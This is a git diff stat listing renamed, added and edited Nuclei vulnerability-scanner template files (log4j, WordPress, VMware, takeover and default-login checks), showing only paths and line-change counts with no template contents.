.../Other/ultimatemember-open-redirect.yaml | 3 - .../ultimatemember-plugin-open-redirect.yaml | 3 - ...ssrf.yaml => umbraco-base-ssrf-10882.yaml} | 0 nuclei-templates/Other/umbraco-installer.yaml | 5 +- nuclei-templates/Other/umbraco-login.yaml | 17 +- .../{signatures-10251.yaml => umbraco.yaml} | 0 .../Other/unaunthenticated-jenkin.yaml | 6 +- .../Other/unauth-axyom-network-manager.yaml | 5 +- nuclei-templates/Other/unauth-etherpad.yaml | 5 +- .../Other/unauth-fastvue-dashboard.yaml | 9 +- ...h-ftp-10942.yaml => unauth-ftp-10940.yaml} | 0 ...aml => unauth-hoteldruid-panel-10943.yaml} | 0 nuclei-templates/Other/unauth-kubecost.yaml | 66 +- .../Other/unauth-ldap-account-manager.yaml | 7 +- nuclei-templates/Other/unauth-lfd-zhttpd.yaml | 7 +- .../Other/unauth-mautic-upgrade.yaml | 7 +- nuclei-templates/Other/unauth-mercurial.yaml | 5 +- ...ad.yaml => unauth-message-read-10947.yaml} | 0 nuclei-templates/Other/unauth-psql.yaml | 5 +- nuclei-templates/Other/unauth-rlm-10960.yaml | 35 + nuclei-templates/Other/unauth-rlm.yaml | 29 - .../Other/unauth-selenium-grid-console.yaml | 8 +- .../Other/unauth-spark-api-10963.yaml | 22 + nuclei-templates/Other/unauth-spark-api.yaml | 24 - .../Other/unauth-wavink-panel.yaml | 12 +- .../Other/unauth-xproxy-dashboard-10968.yaml | 27 + .../Other/unauth-xproxy-dashboard.yaml | 26 - nuclei-templates/Other/unauth-zwave-mqtt.yaml | 7 +- ...aml => unauthenticated-airflow-10884.yaml} | 0 .../unauthenticated-alert-manager-10890.yaml | 23 - .../unauthenticated-alert-manager-10892.yaml | 20 + ...unauthenticated-duplicator-disclosure.yaml | 6 +- .../Other/unauthenticated-frp-10897.yaml | 26 - .../Other/unauthenticated-frp.yaml | 21 + .../Other/unauthenticated-glances.yaml | 4 - .../Other/unauthenticated-glowroot.yaml | 4 +- .../Other/unauthenticated-influxdb-10903.yaml | 27 - .../Other/unauthenticated-influxdb.yaml | 23 + .../Other/unauthenticated-jenkins.yaml | 44 +- .../unauthenticated-lansweeper-10906.yaml | 14 + .../Other/unauthenticated-lansweeper.yaml | 17 - ... unauthenticated-mongo-express-10909.yaml} | 0 ...aml => unauthenticated-netdata-10916.yaml} | 0 .../unauthenticated-nginx-dashboard.yaml | 8 +- .../unauthenticated-popup-upload-10923.yaml | 24 + .../Other/unauthenticated-popup-upload.yaml | 20 - .../Other/unauthenticated-prtg.yaml | 3 +- ...=> unauthenticated-tensorboard-10930.yaml} | 0 .../unauthenticated-varnish-cache-purge.yaml | 1 + .../Other/unauthenticated-zipkin-10935.yaml | 30 + .../Other/unauthenticated-zipkin.yaml | 31 - ...aml => unauthenticated-zippkin-10937.yaml} | 0 .../Other/unauthorized-h3csecparh-login.yaml | 4 - .../unauthorized-hp-officepro-printer.yaml | 4 +- .../Other/unauthorized-hp-printer.yaml | 48 +- .../Other/unauthorized-plastic-scm-10957.yaml | 50 + .../Other/unauthorized-plastic-scm.yaml | 42 - .../Other/unauthorized-printer-hp.yaml | 7 +- ...ized-puppet-node-manager-detect-10959.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 20 + ...0971.yaml => unbounce-takeover-10970.yaml} | 0 .../Other/under-construction-page.yaml | 4 +- .../unencrypted-bigip-ltm-cookie-10972.yaml | 23 + nuclei-templates/Other/unibox-panel.yaml | 5 +- .../Other/unifi-network-log4j-rce-10976.yaml | 38 + .../Other/unifi-network-log4j-rce.yaml | 43 - nuclei-templates/Other/unifi-panel.yaml | 8 +- .../Other/unifi-wizard-install.yaml | 5 +- .../Other/unifi_network_application.yaml | 20 + ...unified_communications_domain_manager.yaml | 20 + .../Other/unpatched-coldfusion-10977.yaml | 33 - .../Other/unpatched-coldfusion.yaml | 30 + .../Other/untangle-admin-login.yaml | 7 +- .../Other/untrusted-root-certificate.yaml | 5 +- nuclei-templates/Other/unyson.yaml | 6 +- nuclei-templates/Other/updraftplus.yaml | 4 +- nuclei-templates/Other/upnp-device.yaml | 3 +- nuclei-templates/Other/ups-status-10984.yaml | 21 + nuclei-templates/Other/ups-status.yaml | 20 - nuclei-templates/Other/uptime-kuma-panel.yaml | 5 +- .../Other/uptimerobot-takeover-10987.yaml | 16 +- .../Other/url-extension-inspector.yaml | 100 +- nuclei-templates/Other/use-any-font.yaml | 2 +- nuclei-templates/Other/user-role-editor.yaml | 2 +- .../Other/uservoice-takeover.yaml | 6 +- nuclei-templates/Other/usg1000_firmware.yaml | 20 + .../Other/utility-service-detect.yaml | 7 +- nuclei-templates/Other/uvdesk-install.yaml | 5 +- nuclei-templates/Other/uwsgi-ini.yaml | 5 +- nuclei-templates/Other/v2924-admin-panel.yaml | 9 +- .../Other/vagrantfile-exposure.yaml | 5 +- nuclei-templates/Other/valid-gmail-check.yaml | 9 +- .../Other/vanguard-post-xss-10992.yaml | 34 + nuclei-templates/Other/vanguard-post-xss.yaml | 29 - nuclei-templates/Other/vault-panel.yaml | 26 +- nuclei-templates/Other/vbulletin-detect.yaml | 5 +- nuclei-templates/Other/vcenter_server.yaml | 20 + nuclei-templates/Other/vec40g.yaml | 20 + nuclei-templates/Other/veeam-backup-gcp.yaml | 9 +- nuclei-templates/Other/veeam-panel.yaml | 12 +- .../Other/velvet-blues-update-urls.yaml | 2 +- .../Other/vend-takeover-10997.yaml | 15 + nuclei-templates/Other/vend-takeover.yaml | 18 - nuclei-templates/Other/ventrilo-config.yaml | 13 +- .../Other/vercel-takeover-11001.yaml | 28 +- nuclei-templates/Other/veriz0wn-osint.yaml | 5 +- .../Other/verizon-router-panel.yaml | 9 +- .../Other/vernemq-status-page.yaml | 6 +- .../Other/versa-analytics-server.yaml | 5 +- .../Other/versa-default-login-11003.yaml | 46 + .../Other/versa-default-login.yaml | 49 - .../Other/versa-director-api.yaml | 5 +- .../Other/versa-director-login.yaml | 9 +- .../Other/versa-flexvnf-default-login.yaml | 9 +- .../Other/versa-flexvnf-panel.yaml | 9 +- .../Other/versa-flexvnf-server.yaml | 7 +- .../Other/versa-networks-detect.yaml | 7 +- nuclei-templates/Other/versa-sdwan-11005.yaml | 20 - nuclei-templates/Other/versa-sdwan.yaml | 16 + .../Other/versa_operating_system.yaml | 20 + nuclei-templates/Other/vertex-tax-panel.yaml | 9 +- .../Other/video-synchro-pdf-lfi.yaml | 4 - nuclei-templates/Other/videoxpert-lfi.yaml | 5 +- .../Other/vidyo-default-login-11008.yaml | 61 - .../Other/vidyo-default-login.yaml | 52 + nuclei-templates/Other/vidyo-login.yaml | 7 +- .../Other/viewlinc-crlf-injection-11014.yaml | 29 + .../Other/viewlinc-crlf-injection.yaml | 30 - .../Other/viewpoint-system-status-11018.yaml | 23 - .../Other/viewpoint-system-status-11019.yaml | 20 + nuclei-templates/Other/vigor-login-11023.yaml | 3 - nuclei-templates/Other/vinchin-panel.yaml | 5 +- nuclei-templates/Other/viper-c2.yaml | 7 +- .../Other/virtua-software-panel.yaml | 15 +- .../Other/virtual-ema-detect-11025.yaml | 21 - .../Other/virtual-ema-detect.yaml | 18 + .../Other/visionhub-default-login-11029.yaml | 34 + .../Other/visionhub-default-login.yaml | 36 - nuclei-templates/Other/vistaweb-panel.yaml | 4 +- .../Other/visual-tools-dvr-rce-11030.yaml | 28 - .../Other/visual-tools-dvr-rce-11032.yaml | 24 + .../Other/vivotex-web-console-detect.yaml | 7 +- .../vmware-authentication-daemon-detect.yaml | 66 +- .../Other/vmware-carbon-black-edr.yaml | 9 +- .../Other/vmware-cloud-availability.yaml | 9 +- .../Other/vmware-cloud-director.yaml | 12 +- nuclei-templates/Other/vmware-cloud-xss.yaml | 5 +- nuclei-templates/Other/vmware-ftp-server.yaml | 9 +- nuclei-templates/Other/vmware-hcx-log4j.yaml | 27 +- nuclei-templates/Other/vmware-hcx-login.yaml | 9 +- ...horizon.yaml => vmware-horizon-11038.yaml} | 0 .../Other/vmware-horizon-daas.yaml | 10 +- .../vmware-horizon-log4j-jndi-rce-11033.yaml | 38 + .../vmware-horizon-log4j-jndi-rce-11034.yaml | 37 - .../Other/vmware-horizon-panel-11037.yaml | 21 + .../Other/vmware-horizon-panel.yaml | 22 - .../Other/vmware-horizon-version.yaml | 5 +- nuclei-templates/Other/vmware-nsx-log4j.yaml | 36 +- nuclei-templates/Other/vmware-nsx-login.yaml | 9 +- .../Other/vmware-nsx-stream-rce.yaml | 10 +- .../Other/vmware-operation-manager-log4j.yaml | 34 +- .../Other/vmware-siterecovery-log4j-rce.yaml | 38 +- .../vmware-vcenter-converter-standalone.yaml | 12 +- ...lfi.yaml => vmware-vcenter-lfi-11048.yaml} | 0 .../Other/vmware-vcenter-lfi-linux-11042.yaml | 14 + .../Other/vmware-vcenter-lfi-linux-11044.yaml | 16 - .../Other/vmware-vcenter-log4j-jndi-rce.yaml | 9 +- .../Other/vmware-vcenter-ssrf.yaml | 7 +- .../Other/vmware-vcloud-director.yaml | 12 +- .../Other/vmware-version-detect-11054.yaml | 63 - .../Other/vmware-version-detect.yaml | 57 + ...yaml => vmware-vrealize-detect-11057.yaml} | 0 ...rkflow.yaml => vmware-workflow-11060.yaml} | 0 nuclei-templates/Other/vnc-detect-11062.yaml | 22 + nuclei-templates/Other/vnc-detect.yaml | 24 - .../Other/vnc-service-detect.yaml | 11 +- .../Other/vodafone-voxui-panel.yaml | 9 +- ...ect.yaml => voipmonitor-detect-11063.yaml} | 0 nuclei-templates/Other/voipmonitor-panel.yaml | 15 +- ...4.yaml => voipmonitor-workflow-11065.yaml} | 0 nuclei-templates/Other/voyager.yaml | 20 + .../Other/vpms-auth-bypass-11068.yaml | 33 - nuclei-templates/Other/vpms-auth-bypass.yaml | 32 + nuclei-templates/Other/vpn.yaml | 20 + .../Other/vrealize-loginsight-panel.yaml | 12 +- .../vrealize-operations-log4j-rce-11072.yaml | 44 + .../Other/vrealize-operations-log4j-rce.yaml | 69 - .../Other/vrealize_operations.yaml | 20 + .../Other/vrealize_operations_manager.yaml | 20 + nuclei-templates/Other/vscode-sftp.yaml | 6 +- nuclei-templates/Other/vsftpd-backdoor.yaml | 9 +- ...ction.yaml => vsftpd-detection-11073.yaml} | 0 nuclei-templates/Other/vtiger-installer.yaml | 5 +- nuclei-templates/Other/vue-pacs-panel.yaml | 10 +- nuclei-templates/Other/w3-total-cache.yaml | 2 +- .../Other/w3c-total-cache-ssrf-11080.yaml | 19 + .../Other/w3c-total-cache-ssrf.yaml | 20 - nuclei-templates/Other/wadl-api-11084.yaml | 43 + nuclei-templates/Other/wadl-api.yaml | 38 - nuclei-templates/Other/wadl-files.yaml | 4 + nuclei-templates/Other/waf-detect.yaml | 93 +- nuclei-templates/Other/waf-fuzz.yaml | 6 +- nuclei-templates/Other/wago-plc-panel.yaml | 5 +- .../Other/wagtail-cms-detect.yaml | 73 +- .../Other/wamp-server-configuration.yaml | 44 +- .../Other/wamp-xdebug-detect-11100.yaml | 17 + .../Other/wamp-xdebug-detect-11103.yaml | 19 - .../Other/wampserver-homepage.yaml | 9 +- ...g-ngfw-rce.yaml => wangkang-NGFW-rce.yaml} | 0 ...-rce-1.yaml => wangkang-NS-ASG-rce-1.yaml} | 0 nuclei-templates/Other/wannacry-malware.yaml | 7 +- .../Other/wapples-firewall-lfi.yaml | 8 +- nuclei-templates/Other/watcher-panel.yaml | 6 +- .../Other/watchguard-panel-11108.yaml | 25 - nuclei-templates/Other/watchguard-panel.yaml | 21 + nuclei-templates/Other/watershed-panel.yaml | 9 +- .../Other/wazuh-default-login.yaml | 36 +- ...uh-detect.yaml => wazuh-detect-11111.yaml} | 0 nuclei-templates/Other/wazuh-panel-11113.yaml | 39 - nuclei-templates/Other/wazuh-panel.yaml | 33 + nuclei-templates/Other/wazuh.yaml | 20 + nuclei-templates/Other/wd-mycloud-panel.yaml | 10 +- .../Other/weak-cipher-suites.yaml | 1081 +- nuclei-templates/Other/weatherlink-11115.yaml | 22 - nuclei-templates/Other/weatherlink-11117.yaml | 19 + ...> weave-scope-dashboard-detect-11118.yaml} | 0 .../Other/weaver-group-xml-sqli.yaml | 9 +- .../Other/weaver-jquery-file-upload.yaml | 4 +- .../weaver-lazyuploadify-file-upload.yaml | 13 +- .../Other/weaver-login-sessionkey.yaml | 4 +- .../weaver-office-server-file-upload.yaml | 8 +- .../Other/weaver-uploadify-file-upload.yaml | 16 +- nuclei-templates/Other/web-config-11125.yaml | 23 + nuclei-templates/Other/web-config.yaml | 165 - nuclei-templates/Other/web-file-manager.yaml | 9 +- .../Other/web-ftp-detect-11136.yaml | 23 + nuclei-templates/Other/web-ftp-detect.yaml | 23 - .../Other/web-local-craft-11141.yaml | 19 + nuclei-templates/Other/web-local-craft.yaml | 22 - nuclei-templates/Other/web-service-panel.yaml | 3 - .../Other/web-suite-detect-11168.yaml | 39 + nuclei-templates/Other/web-suite-detect.yaml | 36 - nuclei-templates/Other/web-viewer-panel.yaml | 10 +- .../Other/webalizer-statistics.yaml | 10 +- .../Other/webalizer-xtended-stats.yaml | 5 +- .../Other/webasyst-installer.yaml | 5 +- nuclei-templates/Other/webcomco-panel.yaml | 5 +- nuclei-templates/Other/webdav-enabled.yaml | 11 +- nuclei-templates/Other/webeditors-11129.yaml | 26 + .../Other/webeditors-check-detect.yaml | 50 +- nuclei-templates/Other/webeditors.yaml | 31 - .../Other/webex_meetings_online.yaml | 20 + .../Other/webflow-takeover-11133.yaml | 18 + nuclei-templates/Other/webflow-takeover.yaml | 16 - ...detect.yaml => weblogic-detect-11143.yaml} | 0 ...t.yaml => weblogic-iiop-detect-11148.yaml} | 0 nuclei-templates/Other/weblogic-login.yaml | 5 - .../Other/weblogic-t3-detect-11153.yaml | 38 + .../Other/weblogic-t3-detect.yaml | 41 - .../Other/weblogic-uddiexplorer.yaml | 11 +- ...55.yaml => weblogic-weak-login-11156.yaml} | 0 .../Other/webmin-panel-11158.yaml | 17 + nuclei-templates/Other/webmin-panel.yaml | 19 - .../Other/webmodule-ee-11162.yaml | 22 + .../Other/webmodule-ee-11164.yaml | 21 - .../Other/webmodule-ee-panel-11161.yaml | 32 + .../Other/webmodule-ee-panel.yaml | 28 - .../Other/webp-converter-for-media.yaml | 2 +- nuclei-templates/Other/webp-express.yaml | 2 +- .../Other/webp-server-go-lfi.yaml | 5 +- nuclei-templates/Other/webpack-config.yaml | 15 +- nuclei-templates/Other/webpack-mix-js.yaml | 5 +- nuclei-templates/Other/webpagetest-panel.yaml | 7 +- nuclei-templates/Other/webpagetest-ssrf.yaml | 5 +- nuclei-templates/Other/webpagetest.yaml | 20 + nuclei-templates/Other/webroot-login.yaml | 9 +- nuclei-templates/Other/websheets-config.yaml | 15 +- .../Other/webshell4-login-panel.yaml | 10 +- .../Other/websphere-portal-preauth-ssrf.yaml | 60 +- nuclei-templates/Other/websphere.yaml | 20 + ...talk-leakage.yaml => webtalk-leakage.yaml} | 0 .../Other/webtitan-cloud-panel.yaml | 12 +- nuclei-templates/Other/webtools-home.yaml | 4 - .../Other/webtransfer-client-panel.yaml | 4 +- nuclei-templates/Other/webui-rce-11173.yaml | 32 + nuclei-templates/Other/webui-rce.yaml | 25 - .../Other/webuzo-admin-panel.yaml | 15 +- nuclei-templates/Other/webuzo-installer.yaml | 5 +- ...ebview-addjavascript-interface-11177.yaml} | 0 .../Other/webview-javascript-11178.yaml | 16 + .../Other/webview-javascript.yaml | 13 - .../Other/webview-load-url-11181.yaml | 12 + .../Other/webview-load-url-11182.yaml | 16 - .../Other/webview-universal-access.yaml | 5 +- nuclei-templates/Other/wechat.yaml | 20 + .../weekender-newspaper-open-redirect.yaml | 3 - ...nder-newspaper-wp-theme-open-redirect.yaml | 3 - nuclei-templates/Other/weiphp-panel.yaml | 14 +- .../Other/weiphp-sql-injection-11190.yaml | 28 - .../Other/weiphp-sql-injection.yaml | 24 + .../Other/wems-manager-xss-11191.yaml | 26 + nuclei-templates/Other/wems-manager-xss.yaml | 28 - ...ml => werkzeug-debugger-detect-11196.yaml} | 0 .../Other/wget-hsts-list-exposure.yaml | 5 +- nuclei-templates/Other/wgetrc-config.yaml | 16 +- nuclei-templates/Other/whatsup_gold.yaml | 24 + nuclei-templates/Other/whm-login-detect.yaml | 3 - .../Other/widget-importer-exporter.yaml | 2 +- ....yaml => wifisky-default-login-11204.yaml} | 0 .../Other/wifisky-default-password.yaml | 8 +- .../Other/wildcard-postmessage.yaml | 3 - nuclei-templates/Other/wildcard-tls.yaml | 18 +- .../Other/wildfly-default-login.yaml | 8 +- ...ly-panel.yaml => wildfly-panel-11211.yaml} | 0 .../Other/window-name-domxss-11213.yaml | 81 + .../Other/window-name-domxss.yaml | 81 - nuclei-templates/Other/windows-lfi-fuzz.yaml | 71 - .../Other/wing-ftp-service-detect.yaml | 2 +- .../Other/wireless-leakage(1).yaml | 6 +- nuclei-templates/Other/wiren-board-webui.yaml | 8 +- ...over.yaml => wishpond-takeover-11217.yaml} | 0 ...-takeover.yaml => wix-takeover-11220.yaml} | 0 nuclei-templates/Other/wms-server-detect.yaml | 5 +- .../Other/wmw-enterprise-panel.yaml | 6 +- nuclei-templates/Other/wn604.yaml | 20 + ...etect.yaml => wondercms-detect-11222.yaml} | 0 .../Other/woo-cart-abandonment-recovery.yaml | 2 +- .../Other/woo-checkout-field-editor-pro.yaml | 2 +- .../Other/woo-variation-swatches.yaml | 2 +- ...merce-gateway-paypal-express-checkout.yaml | 6 +- .../Other/woocommerce-gateway-stripe.yaml | 2 +- .../Other/woocommerce-payments.yaml | 6 +- .../Other/woocommerce-paypal-payments.yaml | 2 +- ...oocommerce-pdf-invoices-packing-slips.yaml | 2 +- .../Other/woocommerce-pdf-invoices-xss.yaml | 15 +- .../Other/woocommerce-services.yaml | 2 +- nuclei-templates/Other/woocommerce.yaml | 2 +- nuclei-templates/Other/woodwing-panel.yaml | 14 +- ...227.yaml => wooyun-2015-148227-11227.yaml} | 0 .../Other/wooyun-2015-148227-11228.yaml | 2 +- .../Other/wooyun-path-traversal-11229.yaml | 31 + .../Other/wooyun-path-traversal.yaml | 29 - nuclei-templates/Other/wordfence.yaml | 2 +- nuclei-templates/Other/wordpress-LFI.yaml | 21 - .../wordpress-accessible-wpconfig-11236.yaml | 42 + .../Other/wordpress-accessible-wpconfig.yaml | 38 - ...l => wordpress-affiliatewp-log-11243.yaml} | 0 .../wordpress-auth-bypass-wptimecapsule.yaml | 10 +- ...=> wordpress-db-backup-listing-11248.yaml} | 0 .../Other/wordpress-db-repair-11254.yaml | 13 +- ...59.yaml => wordpress-debug-log-11258.yaml} | 0 nuclei-templates/Other/wordpress-detect.yaml | 8 +- .../wordpress-directory-listing-11262.yaml | 21 + .../wordpress-directory-listing-11263.yaml | 25 - .../wordpress-duplicator-path-traversal.yaml | 4 +- .../wordpress-elementor-plugin-listing.yaml | 4 - ...emails-verification-for-woocommerce-1.yaml | 29 + ... => wordpress-emergency-script-11272.yaml} | 0 ...8.yaml => wordpress-git-config-11279.yaml} | 0 .../Other/wordpress-gotmls-detect-11280.yaml | 30 - .../Other/wordpress-gotmls-detect.yaml | 25 + .../Other/wordpress-importer.yaml | 2 +- ...ordpress-infinitewp-auth-bypass-11285.yaml | 60 + .../wordpress-infinitewp-auth-bypass.yaml | 58 - .../Other/wordpress-installer-log-11290.yaml | 21 - .../Other/wordpress-installer-log.yaml | 19 + nuclei-templates/Other/wordpress-lfi(1).yaml | 25 + ...-login.yaml => wordpress-login-11295.yaml} | 0 .../Other/wordpress-plugins-detect-11298.yaml | 27 + .../Other/wordpress-plugins-detect.yaml | 22 - .../Other/wordpress-readme-file.yaml | 6 +- .../wordpress-redirection-plugin-listing.yaml | 7 +- .../Other/wordpress-registration-enabled.yaml | 24 + ...hing.yaml => wordpress-rest-dosviacp.yaml} | 0 nuclei-templates/Other/wordpress-seo.yaml | 2 +- ...yaml => wordpress-simplefilelist-rce.yaml} | 0 .../Other/wordpress-takeover-11313.yaml | 26 - .../Other/wordpress-takeover.yaml | 22 + .../Other/wordpress-themes-detect.yaml | 16 +- .../Other/wordpress-tmm-db-migrate-11317.yaml | 23 + .../Other/wordpress-tmm-db-migrate-11320.yaml | 33 - .../wordpress-updraftplus-pem-key-11328.yaml | 27 - .../Other/wordpress-updraftplus-pem-key.yaml | 23 + .../Other/wordpress-user-enumeration.yaml | 6 +- ... => wordpress-weak-credentials-11334.yaml} | 0 ... wordpress-woocommerce-listing-11341.yaml} | 0 .../wordpress-woocommerce-sqli-11343.yaml | 39 + .../Other/wordpress-woocommerce-sqli.yaml | 38 - ...debars.yaml => wordpress-woosidebars.yaml} | 0 .../Other/wordpress-wordfence-lfi-11349.yaml | 25 - .../Other/wordpress-wordfence-lfi-11351.yaml | 21 + ...dpress-wordfence-waf-bypass-xss-11354.yaml | 25 + .../wordpress-wordfence-waf-bypass-xss.yaml | 29 - .../Other/wordpress-wordfence-xss-11359.yaml | 23 + .../Other/wordpress-wordfence-xss.yaml | 27 - ...low.yaml => wordpress-workflow-11366.yaml} | 0 nuclei-templates/Other/wordpress-wp-cron.yaml | 6 +- ...ress-wpcourses-info-disclosure-11367.yaml} | 0 .../Other/wordpress-xmlrpc-brute-force.yaml | 50 + .../Other/wordpress-xmlrpc-listmethods.yaml | 1 + .../Other/wordpress-zebra-form-xss-11378.yaml | 34 + .../Other/wordpress-zebra-form-xss.yaml | 38 - .../Other/wordpress_SSRF_Qards (1).yaml | 64 +- nuclei-templates/Other/worker.yaml | 2 +- .../Other/workerman-websocket-detect.yaml | 5 +- nuclei-templates/Other/workflow.yaml | 11 +- nuclei-templates/Other/workresources-rdp.yaml | 4 - .../Other/worksites-detection-11385.yaml | 17 + .../Other/worksites-detection.yaml | 17 - ...ver.yaml => worksites-takeover-11388.yaml} | 0 ...paceone-uem-airwatch-dashboard-detect.yaml | 1 - .../Other/wowza-streaming-engine-11399.yaml | 22 + .../Other/wowza-streaming-engine.yaml | 23 - ...p-123contactform-plugin-listing-11400.yaml | 28 - .../wp-123contactform-plugin-listing.yaml | 24 + nuclei-templates/Other/wp-adaptive-xss.yaml | 5 - nuclei-templates/Other/wp-all-export-xss.yaml | 18 +- .../Other/wp-altair-listing-11405.yaml | 27 - nuclei-templates/Other/wp-altair-listing.yaml | 24 + .../Other/wp-ambience-xss-11407.yaml | 29 - .../Other/wp-ambience-xss-11410.yaml | 24 + ...{wp-app-log.yaml => wp-app-log-11411.yaml} | 0 .../Other/wp-arforms-listing-11415.yaml | 23 + .../Other/wp-arforms-listing.yaml | 28 - ...pose-cloud-ebook-plugin-file-download.yaml | 2 +- .../Other/wp-blogroll-fun-xss.yaml | 9 +- .../Other/wp-brandfolder-plugin-lfi.yaml | 2 +- .../wp-brandfolder-plugin-open-redirect.yaml | 3 - .../Other/wp-cherry-plugin-file-download.yaml | 2 +- .../Other/wp-church-admin-lfi.yaml | 2 +- ...20.yaml => wp-church-admin-xss-11422.yaml} | 0 nuclei-templates/Other/wp-cli-exposure.yaml | 5 +- .../Other/wp-config.php-disclosure.yaml | 35 +- ...s.yaml => wp-custom-tables-xss-11435.yaml} | 0 nuclei-templates/Other/wp-fastest-cache.yaml | 2 +- nuclei-templates/Other/wp-file-manager.yaml | 2 +- ...nder-xss.yaml => wp-finder-xss-11448.yaml} | 0 .../Other/wp-flagem-xss-11451.yaml | 29 + nuclei-templates/Other/wp-flagem-xss.yaml | 24 - .../Other/wp-full-path-disclosure-11455.yaml | 9 +- nuclei-templates/Other/wp-google-maps.yaml | 2 +- .../Other/wp-grimag-open-redirect-11460.yaml | 17 + .../Other/wp-grimag-open-redirect.yaml | 20 - .../wp-gtranslate-open-redirect-11466.yaml | 22 - .../Other/wp-gtranslate-open-redirect.yaml | 22 + .../Other/wp-haberadam-idor-11468.yaml | 5 - ...wp-idx-broker-platinum-listing-11471.yaml} | 0 nuclei-templates/Other/wp-insert-php-xss.yaml | 8 +- nuclei-templates/Other/wp-install-11473.yaml | 22 + nuclei-templates/Other/wp-install.yaml | 25 - .../Other/wp-iwp-client-listing-11476.yaml | 23 + .../Other/wp-iwp-client-listing.yaml | 25 - nuclei-templates/Other/wp-javospot-lfi.yaml | 4 - .../Other/wp-javospot-premium-theme-lfi.yaml | 2 +- .../Other/wp-kadence-blocks-rce.yaml | 9 +- .../Other/wp-knews-xss-11488.yaml | 24 + nuclei-templates/Other/wp-knews-xss.yaml | 29 - .../Other/wp-license-file-11489.yaml | 18 + nuclei-templates/Other/wp-license-file.yaml | 22 - nuclei-templates/Other/wp-mail-smtp.yaml | 2 +- .../wp-mailchimp-log-exposure-11494.yaml | 28 + .../Other/wp-mailchimp-log-exposure.yaml | 23 - .../Other/wp-maintenance-mode.yaml | 2 +- ...p-memphis-documents-library-lfi-11497.yaml | 30 + .../wp-memphis-documents-library-lfi.yaml | 36 - nuclei-templates/Other/wp-migrate-db.yaml | 2 +- nuclei-templates/Other/wp-misconfig.yaml | 36 + ...ml => wp-mstore-plugin-listing-11501.yaml} | 0 .../Other/wp-multibyte-patch.yaml | 2 +- .../Other/wp-multiple-theme-ssrf-11511.yaml | 28 + .../Other/wp-multiple-theme-ssrf.yaml | 31 - .../Other/wp-nextgen-xss-11517.yaml | 29 + nuclei-templates/Other/wp-nextgen-xss.yaml | 25 - nuclei-templates/Other/wp-optimize.yaml | 4 +- .../Other/wp-oxygen-theme-lfi-11521.yaml | 30 + .../Other/wp-oxygen-theme-lfi-11523.yaml | 27 - nuclei-templates/Other/wp-pagenavi.yaml | 4 +- .../Other/wp-phpfreechat-xss-11524.yaml | 25 + .../Other/wp-phpfreechat-xss-11527.yaml | 29 - ...-plugin-1-flashgallery-listing-11530.yaml} | 0 .../Other/wp-plugin-ad-widget-lfi.yaml | 2 +- ...ms.yaml => wp-plugin-lifterlms-11535.yaml} | 0 .../wp-plugin-marmoset-viewer-xss-11538.yaml | 6 +- .../Other/wp-plugin-statistics-sqli.yaml | 5 - .../Other/wp-plugin-utlimate-member.yaml | 7 +- .../Other/wp-plugin-wp-with-spritz-lfi.yaml | 2 +- .../wp-prostore-open-redirect-11550.yaml | 17 + .../Other/wp-prostore-open-redirect.yaml | 20 - nuclei-templates/Other/wp-qards-listing.yaml | 45 +- .../Other/wp-qwiz-online-xss.yaml | 7 +- .../Other/wp-registration-enabled.yaml | 8 +- .../Other/wp-related-post-xss.yaml | 6 +- nuclei-templates/Other/wp-reset.yaml | 2 +- .../wp-revslider-file-download-11553.yaml | 62 +- .../Other/wp-securimage-xss-11557.yaml | 29 + nuclei-templates/Other/wp-securimage-xss.yaml | 24 - .../Other/wp-security-open-redirect.yaml | 23 +- nuclei-templates/Other/wp-setup-config.yaml | 4 - .../Other/wp-sfwd-lms-listing-11562.yaml | 26 - .../Other/wp-sfwd-lms-listing-11565.yaml | 23 + .../Other/wp-simple-fields-lfi-11568.yaml | 19 - .../Other/wp-simple-fields-lfi-11571.yaml | 16 + .../Other/wp-site-editor-lfi.yaml | 5 +- nuclei-templates/Other/wp-sitemap-page.yaml | 2 +- ...11576.yaml => wp-slideshow-xss-11574.yaml} | 0 nuclei-templates/Other/wp-smushit.yaml | 4 +- ...11582.yaml => wp-socialfit-xss-11581.yaml} | 0 nuclei-templates/Other/wp-statistics.yaml | 4 +- nuclei-templates/Other/wp-super-cache.yaml | 2 +- .../Other/wp-super-forms-11588.yaml | 22 - nuclei-templates/Other/wp-super-forms.yaml | 20 + nuclei-templates/Other/wp-sym404.yaml | 5 +- nuclei-templates/Other/wp-test-email.yaml | 59 + .../Other/wp-theme-diarise-lfi.yaml | 2 +- nuclei-templates/Other/wp-tinymce-lfi.yaml | 14 +- .../wp-tinymce-thumbnail-plugin-lfi.yaml | 2 +- ...lfi-11601.yaml => wp-tutor-lfi-11596.yaml} | 0 .../Other/wp-under-construction-ssrf.yaml | 17 +- .../Other/wp-upload-data-11604.yaml | 24 + nuclei-templates/Other/wp-upload-data.yaml | 29 - nuclei-templates/Other/wp-user-avatar.yaml | 5 +- nuclei-templates/Other/wp-userenum.yaml | 93 - .../Other/wp-vault-lfi-11611.yaml | 24 - .../Other/wp-vault-lfi-11612.yaml | 24 + .../Other/wp-wechat-broadcast-lfi.yaml | 5 +- nuclei-templates/Other/wp-whmcs-xss.yaml | 5 - ...-woocommerce-email-verification-11616.yaml | 25 + .../wp-woocommerce-email-verification.yaml | 28 - ...> wp-woocommerce-file-download-11620.yaml} | 0 ...xmlrpc-11629.yaml => wp-xmlrpc-11631.yaml} | 0 .../Other/wp-xmlrpc-brute-force.yaml | 45 - .../wp-xmlrpc-pingback-detection-11628.yaml | 38 + .../Other/wp-xmlrpc-pingback-detection.yaml | 35 - .../Other/wp-yoast-user-enumeration.yaml | 5 +- nuclei-templates/Other/wpcf7-recaptcha.yaml | 2 +- nuclei-templates/Other/wpcf7-redirect.yaml | 2 +- nuclei-templates/Other/wpconfig.yaml | 28 + .../Other/wpdm-cache-session.yaml | 6 +- ...config.yaml => wpengine-config-check.yaml} | 0 .../Other/wpeprivate-config-disclosure.yaml | 2 +- nuclei-templates/Other/wpforms-lite.yaml | 2 +- .../Other/wpify-woo-czech-xss.yaml | 5 +- ...aml => wpmudev-my-calender-xss-11502.yaml} | 0 .../Other/wpmudev-pub-keys-11504.yaml | 24 + nuclei-templates/Other/wpmudev-pub-keys.yaml | 26 - nuclei-templates/Other/wps-hide-login.yaml | 2 +- .../Other/wptouch-open-redirect-11594.yaml | 27 - .../Other/wptouch-open-redirect-11595.yaml | 25 + .../Other/wptouch-plugin-open-redirect.yaml | 19 + nuclei-templates/Other/wptouch-xss.yaml | 9 +- nuclei-templates/Other/ws-ftp-ini.yaml | 6 +- nuclei-templates/Other/ws-ftp-log.yaml | 6 +- 